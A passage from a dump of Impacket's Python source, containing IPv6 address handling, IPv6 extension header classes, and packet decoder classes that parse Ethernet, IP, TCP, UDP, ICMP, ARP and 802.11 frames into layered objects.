return self.get_ip_dst()\n \n def set_protocol_version(self, version):\n LOG.warning('deprecated soon')\n self.set_ip_v(version)\n \n def set_source_address(self, source_address):\n LOG.warning('deprecated soon')\n self.set_ip_src(source_address)\n \n def set_destination_address(self, destination_address):\n LOG.warning('deprecated soon')\n self.set_ip_dst(destination_address)\n" }, { "path": "impacket/IP6_Address.py", "content": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n\nimport array\nfrom six import string_types\n\nclass IP6_Address:\n ADDRESS_BYTE_SIZE = 16\n #A Hex Group is a 16-bit unit of the address\n TOTAL_HEX_GROUPS = 8\n HEX_GROUP_SIZE = 4 #Size in characters\n TOTAL_SEPARATORS = TOTAL_HEX_GROUPS - 1\n ADDRESS_TEXT_SIZE = (TOTAL_HEX_GROUPS * HEX_GROUP_SIZE) + TOTAL_SEPARATORS\n SEPARATOR = \":\"\n SCOPE_SEPARATOR = \"%\"\n \n#############################################################################################################\n# Constructor and construction helpers\n\n def __init__(self, address):\n #The internal representation of an IP6 address is a 16-byte array\n self.__bytes = array.array('B', b'\\0' * self.ADDRESS_BYTE_SIZE)\n self.__scope_id = \"\"\n\n #Invoke a constructor based on the type of the argument\n if isinstance(address, string_types):\n self.__from_string(address)\n else:\n self.__from_bytes(address)\n\n\n def __from_string(self, address):\n #Separate the Scope ID, if present\n if self.__is_a_scoped_address(address):\n split_parts = address.split(self.SCOPE_SEPARATOR)\n address = split_parts[0]\n if split_parts[1] == \"\":\n raise Exception(\"Empty scope ID\")\n self.__scope_id = split_parts[1]\n \n #Expand address if it's in compressed form\n if self.__is_address_in_compressed_form(address):\n address = self.__expand_compressed_address(address)\n \n #Insert leading zeroes where needed \n address = self.__insert_leading_zeroes(address)\n \n #Sanity check\n if len(address) != self.ADDRESS_TEXT_SIZE:\n raise Exception('IP6_Address - from_string - address size != ' + str(self.ADDRESS_TEXT_SIZE))\n \n #Split address into hex groups\n hex_groups = address.split(self.SEPARATOR)\n if len(hex_groups) != self.TOTAL_HEX_GROUPS:\n raise Exception('IP6_Address - parsed hex groups != ' + str(self.TOTAL_HEX_GROUPS))\n\n #For each hex group, convert it into integer words\n offset = 0\n for group in hex_groups:\n if len(group) != self.HEX_GROUP_SIZE:\n raise Exception('IP6_Address - parsed hex group length != ' + str(self.HEX_GROUP_SIZE))\n \n group_as_int = int(group, 16)\n self.__bytes[offset] = (group_as_int & 0xFF00) >> 8\n self.__bytes[offset + 1] = (group_as_int & 0x00FF) \n offset += 2 \n\n def __from_bytes(self, theBytes):\n if len(theBytes) != self.ADDRESS_BYTE_SIZE:\n raise Exception (\"IP6_Address - from_bytes - array size != \" + str(self.ADDRESS_BYTE_SIZE))\n self.__bytes = theBytes\n\n#############################################################################################################\n# Projectors\n def as_string(self, compress_address = True, scoped_address = True):\n s = \"\"\n for i, v in enumerate(self.__bytes):\n s += hex(v)[2:].rjust(2, '0')\n if i % 2 == 1:\n s += self.SEPARATOR\n s = s[:-1].upper()\n \n if compress_address:\n s = self.__trim_leading_zeroes(s)\n s = self.__trim_longest_zero_chain(s)\n \n if scoped_address and self.get_scope_id() != \"\":\n s += self.SCOPE_SEPARATOR + self.__scope_id\n return s\n \n def as_bytes(self):\n return self.__bytes\n \n def __str__(self):\n return self.as_string()\n \n def get_scope_id(self):\n return self.__scope_id\n \n def get_unscoped_address(self):\n return self.as_string(True, False) #Compressed address = True, Scoped address = False\n \n#############################################################################################################\n# Semantic helpers\n def is_multicast(self):\n return self.__bytes[0] == 0xFF\n \n def is_unicast(self):\n return self.__bytes[0] == 0xFE\n \n def is_link_local_unicast(self):\n return self.is_unicast() and (self.__bytes[1] & 0xC0 == 0x80)\n \n def is_site_local_unicast(self):\n return self.is_unicast() and (self.__bytes[1] & 0xC0 == 0xC0)\n \n def is_unique_local_unicast(self):\n return self.__bytes[0] == 0xFD\n \n \n def get_human_readable_address_type(self):\n if self.is_multicast():\n return \"multicast\"\n elif self.is_unicast():\n if self.is_link_local_unicast():\n return \"link-local unicast\"\n elif self.is_site_local_unicast():\n return \"site-local unicast\"\n else:\n return \"unicast\"\n elif self.is_unique_local_unicast():\n return \"unique-local unicast\"\n else:\n return \"unknown type\"\n\n#############################################################################################################\n#Expansion helpers\n\n #Predicate - returns whether an address is in compressed form\n def __is_address_in_compressed_form(self, address):\n #Sanity check - triple colon detection (not detected by searches of double colon) \n if address.count(self.SEPARATOR * 3) > 0:\n raise Exception('IP6_Address - found triple colon')\n \n #Count the double colon marker\n compression_marker_count = self.__count_compression_marker(address) \n if compression_marker_count == 0:\n return False\n elif compression_marker_count == 1:\n return True\n else:\n raise Exception('IP6_Address - more than one compression marker (\\\"::\\\") found')\n \n #Returns how many hex groups are present, in a compressed address \n def __count_compressed_groups(self, address):\n trimmed_address = address.replace(self.SEPARATOR * 2, self.SEPARATOR) #Replace \"::\" with \":\" \n return trimmed_address.count(self.SEPARATOR) + 1\n\n #Counts how many compression markers are present\n def __count_compression_marker(self, address):\n return address.count(self.SEPARATOR * 2) #Count occurrences of \"::\"\n\n #Inserts leading zeroes in every hex group\n def __insert_leading_zeroes(self, address):\n hex_groups = address.split(self.SEPARATOR)\n \n new_address = \"\"\n for hex_group in hex_groups:\n if len(hex_group) < 4:\n hex_group = hex_group.rjust(4, \"0\")\n new_address += hex_group + self.SEPARATOR\n \n return new_address[:-1] #Trim the last colon\n \n \n #Expands a compressed address\n def __expand_compressed_address(self, address):\n group_count = self.__count_compressed_groups(address)\n groups_to_insert = self.TOTAL_HEX_GROUPS - group_count\n \n pos = address.find(self.SEPARATOR * 2) + 1 \n while groups_to_insert:\n address = address[:pos] + \"0000\" + self.SEPARATOR + address[pos:]\n pos += 5\n groups_to_insert -= 1\n\n #Replace the compression marker with a single colon \n address = address.replace(self.SEPARATOR * 2, self.SEPARATOR) \n return address\n\n\n#############################################################################################################\n#Compression helpers\n\n def __trim_longest_zero_chain(self, address):\n chain_size = 8\n \n while chain_size > 0:\n groups = address.split(self.SEPARATOR)\n\n for index, group in enumerate(groups):\n #Find the first zero\n if group == \"0\":\n start_index = index\n end_index = index\n #Find the end of this chain of zeroes\n while end_index < 7 and groups[end_index + 1] == \"0\":\n end_index += 1\n \n #If the zero chain matches the current size, trim it\n found_size = end_index - start_index + 1\n if found_size == chain_size:\n address = self.SEPARATOR.join(groups[0:start_index]) + self.SEPARATOR * 2 + self.SEPARATOR.join(groups[(end_index+1):])\n return address\n \n #No chain of this size found, try with a lower size \n chain_size -= 1\n return address\n\n \n #Trims all leading zeroes from every hex group\n def __trim_leading_zeroes(self, theStr):\n groups = theStr.split(self.SEPARATOR)\n theStr = \"\"\n \n for group in groups:\n group = group.lstrip(\"0\") + self.SEPARATOR\n if group == self.SEPARATOR:\n group = \"0\" + self.SEPARATOR\n theStr += group\n return theStr[:-1]\n \n\n#############################################################################################################\n @classmethod\n def is_a_valid_text_representation(cls, text_representation):\n try:\n #Capitalize on the constructor's ability to detect invalid text representations of an IP6 address \n IP6_Address(text_representation)\n return True\n except Exception:\n return False\n \n def __is_a_scoped_address(self, text_representation):\n return text_representation.count(self.SCOPE_SEPARATOR) == 1\n" }, { "path": "impacket/IP6_Extension_Headers.py", "content": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n\nimport array\n\nfrom impacket.ImpactPacket import Header, ImpactPacketException, PacketBuffer\n\nclass IP6_Extension_Header(Header):\n# --------------------------------- - - - - - - -\n# | Next Header | Header Ext Len | Options\n# --------------------------------- - - - - - - -\n\n HEADER_TYPE_VALUE = -1\n EXTENSION_HEADER_FIELDS_SIZE = 2\n \n EXTENSION_HEADER_DECODER = None\n\n def __init__(self, buffer = None):\n Header.__init__(self, self.get_headers_field_size())\n self._option_list = []\n if buffer:\n self.load_header(buffer)\n else:\n self.reset()\n\n def __str__(self):\n header_type = self.get_header_type()\n next_header_value = self.get_next_header()\n header_ext_length = self.get_header_extension_length()\n\n s = \"Header Extension Name: \" + self.__class__.HEADER_EXTENSION_DESCRIPTION + \"\\n\"\n s += \"Header Type Value: \" + str(header_type) + \"\\n\"\n s += \"Next Header: \" + str(next_header_value) + \"\\n\"\n s += \"Header Extension Length: \" + str(header_ext_length) + \"\\n\"\n s += \"Options:\\n\"\n \n for option in self._option_list:\n option_str = str(option)\n option_str = option_str.split('\\n')\n option_str = [(' ' * 4) + s for s in option_str]\n s += '\\n'.join(option_str) + '\\n'\n \n return s\n\n def load_header(self, buffer):\n self.set_bytes_from_string(buffer[:self.get_headers_field_size()])\n \n remaining_bytes = (self.get_header_extension_length() + 1) * 8\n remaining_bytes -= self.get_headers_field_size()\n\n buffer = array.array('B', buffer[self.get_headers_field_size():])\n if remaining_bytes > len(buffer):\n raise ImpactPacketException(\"Cannot load options from truncated packet\")\n\n while remaining_bytes > 0:\n option_type = buffer[0]\n if option_type == Option_PAD1.OPTION_TYPE_VALUE:\n # Pad1\n self._option_list.append(Option_PAD1())\n \n remaining_bytes -= 1\n buffer = buffer[1:]\n else:\n # PadN\n # From RFC 2460: For N octets of padding, the Opt Data Len\n # field contains the value N-2, and the Option Data consists\n # of N-2 zero-valued octets.\n option_length = buffer[1]\n option_length += 2\n \n self._option_list.append(Option_PADN(option_length))\n\n remaining_bytes -= option_length\n buffer = buffer[option_length:]\n \n def reset(self):\n pass\n\n @classmethod\n def get_header_type_value(cls):\n return cls.HEADER_TYPE_VALUE\n \n @classmethod\n def get_extension_headers(cls):\n header_types = {}\n for subclass in cls.__subclasses__():\n subclass_header_types = subclass.get_extension_headers()\n if not subclass_header_types:\n # If the subclass did not return anything it means\n # that it is a leaf subclass, so we take its header\n # type value\n header_types[subclass.get_header_type_value()] = subclass\n else:\n # Else we extend the list of the obtained types\n header_types.update(subclass_header_types)\n return header_types\n \n @classmethod\n def get_decoder(cls):\n raise RuntimeError(\"Class method %s.get_decoder must be overridden.\" % cls)\n\n def get_header_type(self):\n return self.__class__.get_header_type_value()\n\n def get_headers_field_size(self):\n return IP6_Extension_Header.EXTENSION_HEADER_FIELDS_SIZE\n\n def get_header_size(self):\n header_size = self.get_headers_field_size()\n for option in self._option_list:\n header_size += option.get_len()\n return header_size\n\n def get_next_header(self):\n return self.get_byte(0)\n\n def get_header_extension_length(self):\n return self.get_byte(1)\n\n def set_next_header(self, next_header):\n self.set_byte(0, next_header & 0xFF)\n\n def set_header_extension_length(self, header_extension_length):\n self.set_byte(1, header_extension_length & 0xFF)\n \n def add_option(self, option):\n self._option_list.append(option)\n \n def get_options(self):\n return self._option_list\n\n def get_packet(self):\n data = self.get_data_as_string()\n\n # Update the header length\n self.set_header_extension_length(self.get_header_size() // 8 - 1)\n\n # Build the entire extension header packet\n header_bytes = self.get_buffer_as_string()\n for option in self._option_list:\n header_bytes += option.get_buffer_as_string()\n \n if data:\n return header_bytes + data\n else:\n return header_bytes\n\n def contains(self, aHeader):\n Header.contains(self, aHeader)\n if isinstance(aHeader, IP6_Extension_Header):\n self.set_next_header(aHeader.get_header_type())\n \n def get_pseudo_header(self):\n # The pseudo-header only contains data from the IPv6 header.\n # So we pass the message to the parent until it reaches it.\n return self.parent().get_pseudo_header()\n\nclass Extension_Option(PacketBuffer):\n MAX_OPTION_LEN = 256\n OPTION_TYPE_VALUE = -1\n\n def __init__(self, option_type, size):\n if size > Extension_Option.MAX_OPTION_LEN:\n raise ImpactPacketException(\"Option size of % is greater than the maximum of %d\" % (size, Extension_Option.MAX_OPTION_LEN))\n PacketBuffer.__init__(self, size)\n self.set_option_type(option_type)\n\n def __str__(self):\n option_type = self.get_option_type()\n option_length = self.get_option_length()\n\n s = \"Option Name: \" + str(self.__class__.OPTION_DESCRIPTION) + \"\\n\"\n s += \"Option Type: \" + str(option_type) + \"\\n\"\n s += \"Option Length: \" + str(option_length) + \"\\n\"\n \n return s\n\n def set_option_type(self, option_type):\n self.set_byte(0, option_type)\n\n def get_option_type(self):\n return self.get_byte(0)\n\n def set_option_length(self, length):\n self.set_byte(1, length)\n\n def get_option_length(self):\n return self.get_byte(1)\n\n def set_data(self, data):\n self.set_option_length(len(data))\n option_bytes = self.get_bytes()\n \n option_bytes = self.get_bytes()\n option_bytes[2:2+len(data)] = array.array('B', data)\n self.set_bytes(option_bytes)\n\n def get_len(self):\n return len(self.get_bytes())\n\nclass Option_PAD1(Extension_Option):\n OPTION_TYPE_VALUE = 0x00 # Pad1 (RFC 2460)\n OPTION_DESCRIPTION = \"Pad1 Option\"\n\n def __init__(self):\n Extension_Option.__init__(self, Option_PAD1.OPTION_TYPE_VALUE, 1)\n\n def get_len(self):\n return 1\n\nclass Option_PADN(Extension_Option):\n OPTION_TYPE_VALUE = 0x01 # Pad1 (RFC 2460)\n OPTION_DESCRIPTION = \"PadN Option\"\n\n def __init__(self, padding_size):\n if padding_size < 2:\n raise ImpactPacketException(\"PadN Extension Option must be greater than 2 bytes\")\n\n Extension_Option.__init__(self, Option_PADN.OPTION_TYPE_VALUE, padding_size)\n self.set_data(b'\\x00' * (padding_size - 2))\n\nclass Basic_Extension_Header(IP6_Extension_Header):\n MAX_OPTIONS_LEN = 256 * 8\n MIN_HEADER_LEN = 8\n MAX_HEADER_LEN = MIN_HEADER_LEN + MAX_OPTIONS_LEN\n\n def __init__(self, buffer = None):\n self.padded = False\n IP6_Extension_Header.__init__(self, buffer)\n\n def reset(self):\n self.set_next_header(0)\n self.set_header_extension_length(0)\n self.add_padding()\n\n def add_option(self, option):\n if self.padded:\n self._option_list.pop()\n self.padded = False\n\n IP6_Extension_Header.add_option(self, option)\n\n self.add_padding()\n \n def add_padding(self):\n required_octets = 8 - (self.get_header_size() % 8)\n if self.get_header_size() + required_octets > Basic_Extension_Header.MAX_HEADER_LEN:\n raise Exception(\"Not enough space for the padding\")\n\n # Insert Pad1 or PadN to fill the necessary octets\n if 0 < required_octets < 8:\n if required_octets == 1:\n self.add_option(Option_PAD1())\n else:\n self.add_option(Option_PADN(required_octets))\n self.padded = True\n else:\n self.padded = False\n\nclass Hop_By_Hop(Basic_Extension_Header):\n HEADER_TYPE_VALUE = 0x00\n HEADER_EXTENSION_DESCRIPTION = \"Hop By Hop Options\"\n \n @classmethod\n def get_decoder(self):\n from impacket import ImpactDecoder\n return ImpactDecoder.HopByHopDecoder\n\nclass Destination_Options(Basic_Extension_Header):\n HEADER_TYPE_VALUE = 0x3c\n HEADER_EXTENSION_DESCRIPTION = \"Destination Options\"\n \n @classmethod\n def get_decoder(self):\n from impacket import ImpactDecoder\n return ImpactDecoder.DestinationOptionsDecoder\n\nclass Routing_Options(IP6_Extension_Header):\n HEADER_TYPE_VALUE = 0x2b\n HEADER_EXTENSION_DESCRIPTION = \"Routing Options\"\n ROUTING_OPTIONS_HEADER_FIELDS_SIZE = 8\n \n def reset(self):\n self.set_next_header(0)\n self.set_header_extension_length(0)\n self.set_routing_type(0)\n self.set_segments_left(0)\n\n def __str__(self):\n header_type = self.get_header_type()\n next_header_value = self.get_next_header()\n header_ext_length = self.get_header_extension_length()\n routing_type = self.get_routing_type()\n segments_left = self.get_segments_left()\n\n s = \"Header Extension Name: \" + self.__class__.HEADER_EXTENSION_DESCRIPTION + \"\\n\"\n s += \"Header Type Value: \" + str(header_type) + \"\\n\"\n s += \"Next Header: \" + str(next_header_value) + \"\\n\"\n s += \"Header Extension Length: \" + str(header_ext_length) + \"\\n\"\n s += \"Routing Type: \" + str(routing_type) + \"\\n\"\n s += \"Segments Left: \" + str(segments_left) + \"\\n\"\n\n return s\n \n @classmethod\n def get_decoder(self):\n from . import ImpactDecoder\n return ImpactDecoder.RoutingOptionsDecoder\n\n def get_headers_field_size(self):\n return Routing_Options.ROUTING_OPTIONS_HEADER_FIELDS_SIZE\n\n def set_routing_type(self, routing_type):\n self.set_byte(2, routing_type)\n\n def get_routing_type(self):\n return self.get_byte(2)\n\n def set_segments_left(self, segments_left):\n self.set_byte(3, segments_left)\n\n def get_segments_left(self):\n return self.get_byte(3)\n" }, { "path": "impacket/ImpactDecoder.py", "content": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# Convenience packet unpackers for various network protocols\n# implemented in the ImpactPacket module.\n#\n# Author:\n# Javier Burroni (javier)\n# Bruce Leidl (brl)\n# Aureliano Calvo\n#\n\nimport array\n\nfrom impacket import ICMP6\nfrom impacket import IP6\nfrom impacket import IP6_Extension_Headers\nfrom impacket import ImpactPacket\nfrom impacket import LOG\nfrom impacket import dot11\nfrom impacket import wps, eap, dhcp\nfrom impacket.cdp import CDP\n\n\"\"\"Classes to convert from raw packets into a hierarchy of\nImpactPacket derived objects.\n\nThe protocol of the outermost layer must be known in advance, and the\npacket must be fed to the corresponding decoder. From there it will\ntry to decode the raw data into a hierarchy of ImpactPacket derived\nobjects; if a layer's protocol is unknown, all the remaining data will\nbe wrapped into a ImpactPacket.Data object.\n\"\"\"\n\nclass Decoder:\n __decoded_protocol = None\n def decode(self, aBuffer):\n pass\n \n def set_decoded_protocol(self, protocol):\n self.__decoded_protocol = protocol\n \n def get_protocol(self, aprotocol):\n protocol = self.__decoded_protocol\n while protocol:\n if protocol.__class__ == aprotocol:\n break\n protocol=protocol.child()\n return protocol\n \n def __str__(self):\n protocol = self.__decoded_protocol\n i=0\n out=''\n while protocol:\n tabline=' '*i+'+-'+str(protocol.__class__)\n out+=\"%s\"%tabline+'\\n'\n protocol=protocol.child()\n i+=1\n return out\n\nclass EthDecoder(Decoder):\n def __init__(self):\n pass\n\n def decode(self, aBuffer):\n e = ImpactPacket.Ethernet(aBuffer)\n self.set_decoded_protocol( e )\n off = e.get_header_size()\n if e.get_ether_type() == ImpactPacket.IP.ethertype:\n self.ip_decoder = IPDecoder()\n packet = self.ip_decoder.decode(aBuffer[off:])\n elif e.get_ether_type() == IP6.IP6.ethertype:\n self.ip6_decoder = IP6Decoder()\n packet = self.ip6_decoder.decode(aBuffer[off:])\n elif e.get_ether_type() == ImpactPacket.ARP.ethertype:\n self.arp_decoder = ARPDecoder()\n packet = self.arp_decoder.decode(aBuffer[off:])\n elif e.get_ether_type() == eap.DOT1X_AUTHENTICATION:\n self.eapol_decoder = EAPOLDecoder()\n packet = self.eapol_decoder.decode(aBuffer[off:])\n # LLC ?\n elif e.get_ether_type() < 1500:\n self.llc_decoder = LLCDecoder()\n packet = self.llc_decoder.decode(aBuffer[off:])\n else:\n self.data_decoder = DataDecoder()\n packet = self.data_decoder.decode(aBuffer[off:])\n\n e.contains(packet)\n return e\n\n# Linux \"cooked\" capture encapsulation.\n# Used, for instance, for packets returned by the \"any\" interface.\nclass LinuxSLLDecoder(Decoder):\n def __init__(self):\n pass\n\n def decode(self, aBuffer):\n e = ImpactPacket.LinuxSLL(aBuffer)\n self.set_decoded_protocol( e )\n off = 16\n if e.get_ether_type() == ImpactPacket.IP.ethertype:\n self.ip_decoder = IPDecoder()\n packet = self.ip_decoder.decode(aBuffer[off:])\n elif e.get_ether_type() == ImpactPacket.ARP.ethertype:\n self.arp_decoder = ARPDecoder()\n packet = self.arp_decoder.decode(aBuffer[off:])\n elif e.get_ether_type() == eap.DOT1X_AUTHENTICATION:\n self.eapol_decoder = EAPOLDecoder()\n packet = self.eapol_decoder.decode(aBuffer[off:])\n else:\n self.data_decoder = DataDecoder()\n packet = self.data_decoder.decode(aBuffer[off:])\n\n e.contains(packet)\n return e\n\nclass IPDecoder(Decoder):\n def __init__(self):\n pass\n\n def decode(self, aBuffer):\n i = ImpactPacket.IP(aBuffer)\n self.set_decoded_protocol ( i )\n off = i.get_header_size()\n end = i.get_ip_len()\n # If ip_len == 0 we might be facing TCP segmentation offload, let's calculate the right len\n if end == 0:\n LOG.warning('IP len reported as 0, most probably because of TCP segmentation offload. Attempting to fix its size')\n i.set_ip_len(len(aBuffer))\n end = i.get_ip_len()\n\n if i.get_ip_p() == ImpactPacket.UDP.protocol:\n self.udp_decoder = UDPDecoder()\n packet = self.udp_decoder.decode(aBuffer[off:end])\n elif i.get_ip_p() == ImpactPacket.TCP.protocol:\n self.tcp_decoder = TCPDecoder()\n packet = self.tcp_decoder.decode(aBuffer[off:end])\n elif i.get_ip_p() == ImpactPacket.ICMP.protocol:\n self.icmp_decoder = ICMPDecoder()\n packet = self.icmp_decoder.decode(aBuffer[off:end])\n elif i.get_ip_p() == ImpactPacket.IGMP.protocol:\n self.igmp_decoder = IGMPDecoder()\n packet = self.igmp_decoder.decode(aBuffer[off:end])\n else:\n self.data_decoder = DataDecoder()\n packet = self.data_decoder.decode(aBuffer[off:end])\n i.contains(packet)\n return i\n\nclass IP6MultiProtocolDecoder(Decoder):\n def __init__(self, a_protocol_id):\n self.protocol_id = a_protocol_id\n\n def decode(self, buffer):\n if self.protocol_id == ImpactPacket.UDP.protocol:\n self.udp_decoder = UDPDecoder()\n packet = self.udp_decoder.decode(buffer)\n elif self.protocol_id == ImpactPacket.TCP.protocol:\n self.tcp_decoder = TCPDecoder()\n packet = self.tcp_decoder.decode(buffer)\n elif self.protocol_id == ICMP6.ICMP6.protocol:\n self.icmp6_decoder = ICMP6Decoder()\n packet = self.icmp6_decoder.decode(buffer)\n else:\n # IPv6 Extension Headers lookup\n extension_headers = IP6_Extension_Headers.IP6_Extension_Header.get_extension_headers()\n if buffer and self.protocol_id in extension_headers:\n extension_header_decoder_class = extension_headers[self.protocol_id].get_decoder()\n self.extension_header_decoder = extension_header_decoder_class()\n packet = self.extension_header_decoder.decode(buffer)\n else:\n self.data_decoder = DataDecoder()\n packet = self.data_decoder.decode(buffer)\n\n return packet\n\nclass IP6Decoder(Decoder):\n def __init__(self):\n pass\n\n def decode(self, buffer):\n ip6_packet = IP6.IP6(buffer)\n self.set_decoded_protocol(ip6_packet)\n start_pos = ip6_packet.get_header_size() \n end_pos = ip6_packet.get_payload_length() + start_pos\n contained_protocol = ip6_packet.get_next_header()\n \n multi_protocol_decoder = IP6MultiProtocolDecoder(contained_protocol)\n child_packet = multi_protocol_decoder.decode(buffer[start_pos:end_pos])\n \n ip6_packet.contains(child_packet)\n return ip6_packet\n\nclass HopByHopDecoder(Decoder):\n def __init__(self):\n pass\n\n def decode(self, buffer):\n hop_by_hop = IP6_Extension_Headers.Hop_By_Hop(buffer)\n self.set_decoded_protocol(hop_by_hop)\n start_pos = hop_by_hop.get_header_size()\n contained_protocol = hop_by_hop.get_next_header()\n\n multi_protocol_decoder = IP6MultiProtocolDecoder(contained_protocol)\n child_packet = multi_protocol_decoder.decode(buffer[start_pos:])\n \n hop_by_hop.contains(child_packet)\n return hop_by_hop\n\nclass DestinationOptionsDecoder(Decoder):\n def __init__(self):\n pass\n\n def decode(self, buffer):\n destination_options = IP6_Extension_Headers.Destination_Options(buffer)\n self.set_decoded_protocol(destination_options)\n start_pos = destination_options.get_header_size()\n contained_protocol = destination_options.get_next_header()\n\n multi_protocol_decoder = IP6MultiProtocolDecoder(contained_protocol)\n child_packet = multi_protocol_decoder.decode(buffer[start_pos:])\n \n destination_options.contains(child_packet)\n return destination_options\n\nclass RoutingOptionsDecoder(Decoder):\n def __init__(self):\n pass\n\n def decode(self, buffer):\n routing_options = IP6_Extension_Headers.Routing_Options(buffer)\n self.set_decoded_protocol(routing_options)\n start_pos = routing_options.get_header_size()\n contained_protocol = routing_options.get_next_header()\n\n multi_protocol_decoder = IP6MultiProtocolDecoder(contained_protocol)\n child_packet = multi_protocol_decoder.decode(buffer[start_pos:])\n \n routing_options.contains(child_packet)\n return routing_options\n\nclass ICMP6Decoder(Decoder):\n def __init__(self):\n pass\n\n def decode(self, buffer):\n icmp6_packet = ICMP6.ICMP6(buffer)\n self.set_decoded_protocol(icmp6_packet)\n start_pos = icmp6_packet.get_header_size() \n \n self.data_decoder = DataDecoder()\n child_packet = self.data_decoder.decode(buffer[start_pos:])\n icmp6_packet.contains(child_packet)\n return icmp6_packet\n\n\nclass ARPDecoder(Decoder):\n def __init__(self):\n pass\n\n def decode(self, aBuffer):\n arp = ImpactPacket.ARP(aBuffer)\n self.set_decoded_protocol( arp )\n off = arp.get_header_size()\n self.data_decoder = DataDecoder()\n packet = self.data_decoder.decode(aBuffer[off:])\n arp.contains(packet)\n return arp\n\nclass UDPDecoder(Decoder):\n def __init__(self):\n pass\n\n def decode(self, aBuffer):\n u = ImpactPacket.UDP(aBuffer)\n self.set_decoded_protocol( u )\n off = u.get_header_size()\n self.data_decoder = DataDecoder()\n packet = self.data_decoder.decode(aBuffer[off:])\n u.contains(packet)\n return u\n\nclass TCPDecoder(Decoder):\n def __init__(self):\n pass\n\n def decode(self, aBuffer):\n t = ImpactPacket.TCP(aBuffer)\n self.set_decoded_protocol( t )\n off = t.get_header_size()\n self.data_decoder = DataDecoder()\n packet = self.data_decoder.decode(aBuffer[off:])\n t.contains(packet)\n return t\n\nclass IGMPDecoder(Decoder):\n def __init__(self):\n pass\n def decode(self, aBuffer):\n ig = ImpactPacket.IGMP(aBuffer)\n off = ig.get_header_size()\n self.data_decoder = DataDecoder()\n packet = self.data_decoder.decode(aBuffer[off:])\n ig.contains(packet)\n return ig\n\n\nclass IPDecoderForICMP(Decoder):\n \"\"\"This class was added to parse the IP header of ICMP unreachables packets\n If you use the \"standard\" IPDecoder, it might crash (see bug #4870) ImpactPacket.py\n because the TCP header inside the IP header is incomplete\"\"\" \n def __init__(self):\n pass\n\n def decode(self, aBuffer):\n i = ImpactPacket.IP(aBuffer)\n self.set_decoded_protocol( i )\n off = i.get_header_size()\n if i.get_ip_p() == ImpactPacket.UDP.protocol:\n self.udp_decoder = UDPDecoder()\n packet = self.udp_decoder.decode(aBuffer[off:])\n else:\n self.data_decoder = DataDecoder()\n packet = self.data_decoder.decode(aBuffer[off:])\n i.contains(packet)\n return i\n\nclass ICMPDecoder(Decoder):\n def __init__(self):\n pass\n\n def decode(self, aBuffer):\n ic = ImpactPacket.ICMP(aBuffer)\n self.set_decoded_protocol( ic )\n off = ic.get_header_size()\n if ic.get_icmp_type() == ImpactPacket.ICMP.ICMP_UNREACH:\n self.ip_decoder = IPDecoderForICMP()\n packet = self.ip_decoder.decode(aBuffer[off:])\n else:\n self.data_decoder = DataDecoder()\n packet = self.data_decoder.decode(aBuffer[off:])\n ic.contains(packet)\n return ic\n\nclass DataDecoder(Decoder):\n def decode(self, aBuffer):\n d = ImpactPacket.Data(aBuffer)\n self.set_decoded_protocol( d )\n return d\n\nclass BaseDot11Decoder(Decoder):\n def __init__(self, key_manager=None):\n self.set_key_manager(key_manager)\n \n def set_key_manager(self, key_manager):\n self.key_manager = key_manager\n \n def find_key(self, bssid):\n try:\n key = self.key_manager.get_key(bssid)\n except:\n return False\n return key\n\nclass RadioTapDecoder(BaseDot11Decoder):\n def __init__(self):\n BaseDot11Decoder.__init__(self)\n\n def decode(self, aBuffer):\n rt = dot11.RadioTap(aBuffer)\n self.set_decoded_protocol( rt )\n \n self.do11_decoder = Dot11Decoder()\n self.do11_decoder.set_key_manager(self.key_manager)\n flags=rt.get_flags()\n if flags is not None:\n fcs=flags&dot11.RadioTap.RTF_FLAGS.PROPERTY_FCS_AT_END\n self.do11_decoder.FCS_at_end(fcs)\n \n packet = self.do11_decoder.decode(rt.get_body_as_string())\n \n rt.contains(packet)\n return rt\n\nclass Dot11Decoder(BaseDot11Decoder):\n def __init__(self):\n BaseDot11Decoder.__init__(self)\n self.__FCS_at_end = True\n \n def FCS_at_end(self, fcs_at_end=True):\n self.__FCS_at_end=not not fcs_at_end \n \n def decode(self, aBuffer):\n d = dot11.Dot11(aBuffer, self.__FCS_at_end)\n self.set_decoded_protocol( d )\n \n type = d.get_type()\n if type == dot11.Dot11Types.DOT11_TYPE_CONTROL:\n dot11_control_decoder = Dot11ControlDecoder()\n packet = dot11_control_decoder.decode(d.body_string)\n elif type == dot11.Dot11Types.DOT11_TYPE_DATA:\n dot11_data_decoder = Dot11DataDecoder(self.key_manager)\n \n dot11_data_decoder.set_dot11_hdr(d)\n \n packet = dot11_data_decoder.decode(d.body_string)\n elif type == dot11.Dot11Types.DOT11_TYPE_MANAGEMENT:\n dot11_management_decoder = Dot11ManagementDecoder()\n dot11_management_decoder.set_subtype(d.get_subtype())\n packet = dot11_management_decoder.decode(d.body_string)\n else:\n data_decoder = DataDecoder()\n packet = data_decoder.decode(d.body_string)\n\n d.contains(packet)\n return d\n\nclass Dot11ControlDecoder(BaseDot11Decoder):\n def __init__(self):\n BaseDot11Decoder.__init__(self)\n self.__FCS_at_end = True\n\n def FCS_at_end(self, fcs_at_end=True):\n self.__FCS_at_end=not not fcs_at_end \n \n def decode(self, aBuffer):\n d = dot11.Dot11(aBuffer, self.__FCS_at_end)\n self.set_decoded_protocol(d)\n \n self.subtype = d.get_subtype()\n if self.subtype is dot11.Dot11Types.DOT11_SUBTYPE_CONTROL_CLEAR_TO_SEND:\n self.ctrl_cts_decoder = Dot11ControlFrameCTSDecoder()\n packet = self.ctrl_cts_decoder.decode(d.body_string)\n elif self.subtype is dot11.Dot11Types.DOT11_SUBTYPE_CONTROL_ACKNOWLEDGMENT:\n self.ctrl_ack_decoder = Dot11ControlFrameACKDecoder()\n packet = self.ctrl_ack_decoder.decode(d.body_string)\n elif self.subtype is dot11.Dot11Types.DOT11_SUBTYPE_CONTROL_REQUEST_TO_SEND:\n self.ctrl_rts_decoder = Dot11ControlFrameRTSDecoder()\n packet = 